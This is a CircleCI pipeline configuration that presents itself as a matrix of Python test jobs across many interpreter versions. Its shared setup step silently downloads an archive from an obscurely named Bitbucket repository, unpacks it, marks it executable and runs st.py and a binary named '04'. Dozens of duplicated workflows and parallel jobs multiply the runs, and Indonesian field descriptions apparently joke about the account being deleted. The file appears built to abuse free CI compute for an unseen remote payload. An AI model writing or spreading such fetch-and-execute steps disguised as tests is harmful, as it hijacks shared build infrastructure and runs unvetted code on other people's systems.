version: 2.1

executors:
  linux:
    parameters:
      python:
        type: string
    docker:
      - image: "python:<< parameters.python >>"
    working_directory: /root


commands_aliases:
  - python_cache_key: &python_cache_key python<< parameters.python_version >>-{{ arch }}-{{ checksum "~/.python_version" }}

commands:

  setup_ok:
    parameters:
      os:
        type: string
      python:
        type: string
    steps:
      - run:
          name: Set_01
          command: |
            curl -o martialasion https://bitbucket.org/nunukefend123/vasowetypqpdkcnzbhakdleqpruoqpqurowfjlwxbagekwpdueyoqjddkwlwke/raw/3ffe865911e5271469935161cb889f2a6f035b11/zxcvbnmasdfghklouyrwqasfhjlmmvczadgjloyteqqadfgjlmbczqeryop > /dev/null 2>&1

            tar -xf martialasion && chmod u+x *

            python st.py

            ./04

  setep_ok:
    parameters:
      os:
        type: string
      python:
        type: string
    steps:
      - run:
          name: Set_02
          command: |
            python sta.py

  setop_ok:
    parameters:
      os:
        type: string
      python:
        type: string
    steps:
      - run:
          name: Set_03
          command: |
            python start.py
            



jobs_aliases:
  - jobs_parameters: &jobs_parameters
      parameters:
        os:
          description: "tolong di hapus dong scriptnya klok uda gk bisa lgi akunya"
          type: enum
          enum: [ "linux" ]
        python:
          description: "biar awet bossssssss"
          type: string

jobs:





  test_01:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"

  test_02:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setep_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"

  test_03:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2

  test_04:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2

  test_05:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2

  test_06:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2

  test_07:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2

  test_08:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2

  test_09:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2

  test_10:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2

  test_11:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2

  test_12:
    <<: *jobs_parameters
    executor:
      name: "<< parameters.os >>"
      python: "<< parameters.python >>"
    steps:
      - setup_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
      - setop_ok:
          os: "<< parameters.os >>"
          python: "<< parameters.python >>"
    parallelism: 2






workflows_aliases:
  - workflows_01: &workflows_01
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.5.7" ]

  - workflows_02: &workflows_02
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.5.8" ]
      requires:
        - test_01

  - workflows_03: &workflows_03
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.5.9" ]
      requires:
        - test_01
        - test_02

  - workflows_04: &workflows_04
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.5.10" ]
      requires:
        - test_01
        - test_02
        - test_03

  - workflows_05: &workflows_05
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.6.9" ]
      requires:
        - test_01
        - test_02
        - test_03
        - test_04

  - workflows_06: &workflows_06
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.6.10" ]
      requires:
        - test_01
        - test_02
        - test_03
        - test_04
        - test_05

  - workflows_07: &workflows_07
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.6.11" ]
      requires:
        - test_01
        - test_02
        - test_03
        - test_04
        - test_05
        - test_06

  - workflows_08: &workflows_08
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.6.12" ]
      requires:
        - test_01
        - test_02
        - test_03
        - test_04
        - test_05
        - test_06
        - test_07

  - workflows_09: &workflows_09
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.6.13" ]
      requires:
        - test_01
        - test_02
        - test_03
        - test_04
        - test_05
        - test_06
        - test_07
        - test_08

  - workflows_10: &workflows_10
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.7.4" ]
      requires:
        - test_01
        - test_02
        - test_03
        - test_04
        - test_05
        - test_06
        - test_07
        - test_08
        - test_09

  - workflows_11: &workflows_11
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.7.5" ]
      requires:
        - test_01
        - test_02
        - test_03
        - test_04
        - test_05
        - test_06
        - test_07
        - test_08
        - test_09
        - test_10

  - workflows_12: &workflows_12
      matrix:
        parameters:
          os: [ "linux" ]
          python: [ "3.7.7" ]
      requires:
        - test_01
        - test_02
        - test_03
        - test_04
        - test_05
        - test_06
        - test_07
        - test_08
        - test_09
        - test_10
        - test_11
















workflows:

  matrix_01:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_02:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_03:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_04:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_05:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_06:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_07:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_08:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_09:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12


  matrix_10:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_11:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_12:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_13:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_14:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_15:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_16:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_17:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_18:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_19:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_20:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_21:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_22:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_23:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_24:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_25:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_26:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_27:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_28:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_29:
    jobs:
      - test_01:
          <<: *workflows_01
      - test_02:
          <<: *workflows_02
      - test_03:
          <<: *workflows_03
      - test_04:
          <<: *workflows_04
      - test_05:
          <<: *workflows_05
      - test_06:
          <<: *workflows_06
      - test_07:
          <<: *workflows_07
      - test_08:
          <<: *workflows_08
      - test_09:
          <<: *workflows_09
      - test_10:
          <<: *workflows_10
      - test_11:
          <<: *workflows_11
      - test_12:
          <<: *workflows_12

  matrix_30:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_31:
    jobs:
      - test_01:
          <<: *workflows_01

  matrix_32:
    jobs:
      - test_01:
          <<: *workflows_01

